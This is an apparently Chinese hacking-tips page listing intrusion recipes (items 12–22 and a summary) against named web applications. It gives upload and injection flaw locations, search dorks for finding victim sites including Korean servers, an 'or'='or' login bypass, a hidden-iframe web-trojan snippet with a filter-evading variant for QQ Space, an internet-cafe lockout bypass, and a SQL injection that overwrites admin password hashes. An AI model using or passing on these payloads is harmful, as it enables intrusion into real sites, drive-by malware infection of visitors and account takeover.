菜鸟是如何变成ASP木马高手的！

12. 动画名称：媒体中国整站程序存在多处漏洞

　　漏洞程序:媒体中国整站程序(第一版)

　　官方网站:http://meiti.elgod.com/

　　漏洞: %5c(暴库) 上传 注入

　　上传页面:down1/upload.asp

　　13. 名称：免费电话＋MSH命令行工具

　　http://www.globe7.com/ 打开主页，点击坐下角，Free DownLoad，下载到本地，安装，

　　运行后，会提示正在寻找你所在地区的区号。由于是国际长途，注册一个帐号，送100美分，国内计时0.01/分，你就有100分钟可以白打。是一个帐号哦。

　　要注意的就是，固定电话，小灵通 形式为0086521123456 521本来时0521，要省略前面的零，手机号也是一样。

　　14. 名称：Bo-Blog的新漏洞

　　http://网址/index.php?job=../admin/ban

　　把其中"禁止搜索的词"那部分<table>另存出来，里面的地址改完整，插入一句话木马

　　15. 名称：钩魂者入侵传奇私服

　　用百度 搜索 传奇 inurl:tuku

　　或者 传奇 inurl:wplm.htm

　　再或者 传奇 inurlsites.asp

　　友情链接里插入一句话木马即可

　　16. 程序: 宏达企业整站上传漏洞

　　官方主页:http://www.mu126.com/

　　漏洞页面:/cx/upfile.asp (上传漏洞)

　　17．无间盗邮箱，在修改密码里，用户名和密码里添'or'='or'

　　18．名称： bbsxp5.16后台得到webshell

　　bbsxp5.16过滤了 asp,asp,cdx,cer,扩展名的文件上传，就是在基本设置上添加上上传类型也不行，并禁止了修改数据备份数据名称，我们可以把此网页保存在本地，改源代码上传。

　　19．名称：JHACKJ 2005年最新精典教程

　　下载看看吧，不错，各大网站都有

　　20．名称：省力入侵韩国肉鸡

　　在啊D的扫描注入点项，打开这个：http://www.google.co.kr/advanced_search?hl=zh-CN

　　这是高级搜索项，关键字随便写。这里我写asp?name= 设置为每页显示100条。

　　语种选择韩文。搜索，很多sa.

　　21．名称：任何网吧的管理系统破解

　　选智能ABC，然后vv输入，光标后退两步，按delete键 刚输入的两个vv删除, 最后按Inter键

　　22．名称：破解QQ空间插入网页木马的代码

　　现在腾讯 已经封了很多QQ空间代码了 就如 以前 <iframe src="木马地址" name="lcx" width="0" height="0" frameborder="0"></iframe>插入网页木马的代码也早被封了

　　突破禁用的方法 代码如下：

　　<div id=DI><img src="javascript :DI.innerHTML=\'<iframe src=木马地址 width=190 height=190 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\'" style=display:none></div>

　　最后附上总结的

　　1.上传漏洞[不多讲]

　　pS: 如果看到:选择你要上传的文件 [重新上传]或者出现"请登陆后使用"，80%就有漏洞了！

　　有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

　　2.注入漏洞[不多讲]

　　pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:

　　http://注入网址;update admin set password=\'新MD5密码\' where password=\'旧MD5密码\'-- [admin为表名.]

最新评论